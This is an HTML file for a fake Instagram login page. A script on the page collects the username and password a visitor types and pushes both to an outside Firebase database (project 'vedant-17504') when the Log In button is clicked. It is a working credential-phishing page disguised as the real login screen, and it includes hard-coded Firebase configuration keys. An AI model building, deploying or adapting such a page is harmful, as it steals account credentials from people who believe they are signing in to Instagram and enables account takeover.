

<!DOCTYPE html>
<html>
<head>
	<title>Instagram Mobile</title>
	<meta charset="utf-8">
	
  
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">  
  
	<meta name="viewport" content="width=device-width, initial-scale=1">

</head>
<body>

    <!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/7.13.1/firebase.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->


<script>
  // Your web app's Firebase configuration
  var firebaseConfig = {
    apiKey: "AIzaSyDhcslurjwNKWrxFI3sU28_Ug2rjUK_YGs",
    authDomain: "vedant-17504.firebaseapp.com",
    databaseURL: "https://vedant-17504.firebaseio.com",
    projectId: "vedant-17504",
    storageBucket: "vedant-17504.appspot.com",
    messagingSenderId: "184673751603",
    appId: "1:184673751603:web:5faa7684f30119b23fc946",
    measurementId: "G-504GZBSG1D"
  };
  // Initialize Firebase
  firebase.initializeApp(firebaseConfig);
  function jaed()
  {
      var hug  =document.querySelector('.form-control').value;
      var hog =document.querySelector('.vedan').value;
      console.log(hug);
      console.log(hog);

var firebasereff =firebase.database().ref();
firebasereff.child("jaed").push(hug)
var firebasereff =firebase.database().ref();
firebasereff.child("jaed").push(hog)
  }
  
</script>
   
    <style>




@import url('https://fonts.googleapis.com/css?family=Dancing+Script:400,700|Montserrat:300i,400,400i,500,600,700');
body{
	padding: 0;
	margin: 0;
	font-family: 'Dancing Script', cursive;
font-family: 'Montserrat', sans-serif;

}
h1{
	text-align: center;
	padding: 10px;
	font-family: 'Dancing Script', cursive;
	font-size: 110px;
}

form{
	width: 50%;
	margin: 0 auto;
	display: block;
	padding: 20px;
	
}
.btn {
	display: block;
	width: 100%;
	font-size: 16px;
	font-weight: 700;
	letter-spacing: 1px;
}
h4{
	text-align: center;
	padding-top: 20px;
	padding-bottom: 10px;
	text-transform: capitalize;
	font-size: 18px;
	color: #AAB7B8;
	line-height: 2;
	margin-top: 5px;
}
h4:before,h4:after{
	height: 1.5px;
	display: inline-block;
	width: 100px;
	background: #E5E7E9;
	border-right: 1px white;
	content: '';
	margin-left: 10px;
	padding: 1px;
	margin-right: 10px;
}

.form-control{

    background: #F4F6F7;
	font-size: 18px;
	height: 50px;

}





p{
	
	text-align: center;
}

p a{
	text-align: center;
	color: #2980B9 !important;
	font-weight: 500;
	text-decoration: none;
} 
p a:hover{
	color: #2E86C1;
	text-decoration: none;
}
.fa{
	padding-right: 10px;
	font-size: 26px !important;
	color: #1F618D;
	
	line-height: 2;
}
#hub .box{
	
			  border-bottom: 1px solid #D0D3D4 !important;
			  border-top: 1px solid #D0D3D4 !important;
			  height: 35px;
			  background: #ECF0F1;

}
.box p{
	text-align: center;
	padding: 50px;
	font-size: 30px;

}

@media(max-width: 992px){
	.vedan{
        font-size: 14px;
	}
}
@media(max-width: 768px){
	form{
		width: 90%;
	}
}
@media(max-width:550px ){
	.box p {
	
	font-size: 24px;
}
}
@media(max-width: 462px){
		.box p {
	
	font-size: 20px;
}
h1{
	font-size: 90px;
}

}
@media(max-width: 390px){
	.form-control{
	font-size: 12px;
}
h1{
	font-size: 80px;
}
.box p {
	font-size: 16px;
}
}

    </style>
	<section id="hub">
		<div class="container">
		
			<h1>Instagram</h1>
			<form action="#" method="POST">
			 <div class="form-group">
			   
				<input type="name" class="form-control" placeholder="Phone number,username, or email">
			  </div>
			  <div class="form-group">
			   
				<input type="password" class="vedan" placeholder="Password">
			  </div>
			  <button type="button" class="btn btn-primary"  onclick=" jaed()">Log In</button>
			</form>
			<h4>OR</h4>
			<p><i class="fa fa-facebook-square"></i><a href="#">Log In Facebook</a></p>
			<p><a href="#">Forget Password</a></p>
</div>
			<div class="box">
				<p>Don't have account? <a href="#">Sign up</a></p>
			</div>
		
	
	</section>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-125951040-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-125951040-1');
</script>
</body>
</html>
